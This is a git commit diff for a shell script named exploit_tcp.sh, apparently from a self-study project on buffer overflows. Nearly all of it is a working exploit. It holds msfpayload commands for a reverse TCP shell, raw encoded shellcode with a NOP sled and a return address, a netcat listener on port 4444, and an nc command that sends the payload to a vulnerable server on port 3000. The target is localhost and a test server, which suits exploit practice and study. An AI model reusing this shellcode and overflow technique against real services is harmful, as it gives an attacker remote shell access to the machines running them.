diff options
| author | toni <matzeton@googlemail.com> | 2014-06-29 20:52:59 +0200 |
|---|---|---|
| committer | toni <matzeton@googlemail.com> | 2014-06-29 20:52:59 +0200 |
| commit | f2371a6b48d7f76fc07564f4e1e4d64e643a897e (patch) | |
| tree | 91d7f779092ee6fcbbce773e8742ca90b4717bdc /exploit_tcp.sh | |
| parent | 7b891a0d5e83dd9c3295397e3af5e78ec5d3f410 (diff) | |
- makefile improved
- tcp recv() based overrun works
- automatic exploit && shell spawning script
Diffstat (limited to 'exploit_tcp.sh')
| -rwxr-xr-x | exploit_tcp.sh | 30 |
1 files changed, 24 insertions, 6 deletions
diff --git a/exploit_tcp.sh b/exploit_tcp.sh index 4630887..106489d 100755 --- a/exploit_tcp.sh +++ b/exploit_tcp.sh @@ -1,11 +1,29 @@ #!/bin/sh -# shellcode generated with metasploit (exec /bin/sh): -# ./msfpayload linux/x86/exec cmd=/bin/sh R | ./msfencode -b '\x00\x09\x0a\x0d\x1b\x20' +# shellcode generated with metasploit (reverse tcp shell; use netcat as tcp server): +# ./msfpayload linux/x86/shell_reverse_tcp PrependFork=true AppendExit=true LHOST=127.0.0.1 VERBOSE=true R | ./msfencode -b '\x00\x09\x0a\x0d\x1b\x20' -# 117xNOP (0x90) + shellcode + 117xNOP (0x90) + return addr -#[*] Exact match at offset 284 +# 260 --> 260 - 102 = 158 / 2 = 79 +# 79xNOP (0x90) + shellcode + 79xNOP (0x90) + return addr +echo "starting netcat reverse tcp server .." +screen -d -m -S overcat /bin/netcat -l -s 127.0.0.1 -p 4444 +sleep 1 +echo "starting exploitable tcp server .." +./overflow_tcp & +sleep 1 -read -p "Target: " host -python -c 'print "\x90"*117 + "\xd9\xcd\xd9\x74\x24\xf4\xbf\xc9\x14\x15\x14\x5d\x31\xc9\xb1\x0b\x83\xc5\x04\x31\x7d\x16\x03\x7d\x16\xe2\x3c\x7e\x1e\x4c\x27\x2d\x46\x04\x7a\xb1\x0f\x33\xec\x1a\x63\xd4\xec\x0c\xac\x46\x85\xa2\x3b\x65\x07\xd3\x34\x6a\xa7\x23\x6a\x08\xce\x4d\x5b\xbf\x78\x92\xf4\x6c\xf1\x73\x37\x12" + "\x90"*117 + "\x8c\xd3\xff\xff"' | nc -q 0 "$host" 3000 +host="127.0.0.1" +echo "connecting to $host .." +python -c 'print "\x90"*79 + \ +"\xba\x91\x60\x15\x91\xdb\xd6\xd9\x74\x24\xf4\x5f\x2b\xc9" + \ +"\xb1\x13\x31\x57\x15\x83\xc7\x04\x03\x57\x11\xe2\x64\x51" + \ +"\xce\x66\x65\xc1\xb3\xdb\x03\xe4\xba\x3d\x63\x8e\x71\x3d" + \ +"\x10\x16\x3a\x01\xdb\x29\x73\x07\x1a\x41\xfb\xf7\xdc\x93" + \ +"\x6b\xfa\xdc\x82\x37\x73\x3d\x14\xa1\xd3\xec\x06\x9d\xd7" + \ +"\x87\x48\x2c\x57\xc5\xe2\x80\x77\x9a\x9a\xb6\xa8\x3e\x32" + \ +"\x29\x3e\x5d\x96\xe6\xc9\x40\xa7\x02\x07\x02\xf9\xcf\xfd" + \ +"\x03\xa2\x22\x81" + \ +"\x90"*83 + "\x9d\xd4\xff\xff"' | nc -q 0 "$host" 3000 + +screen -R overcat |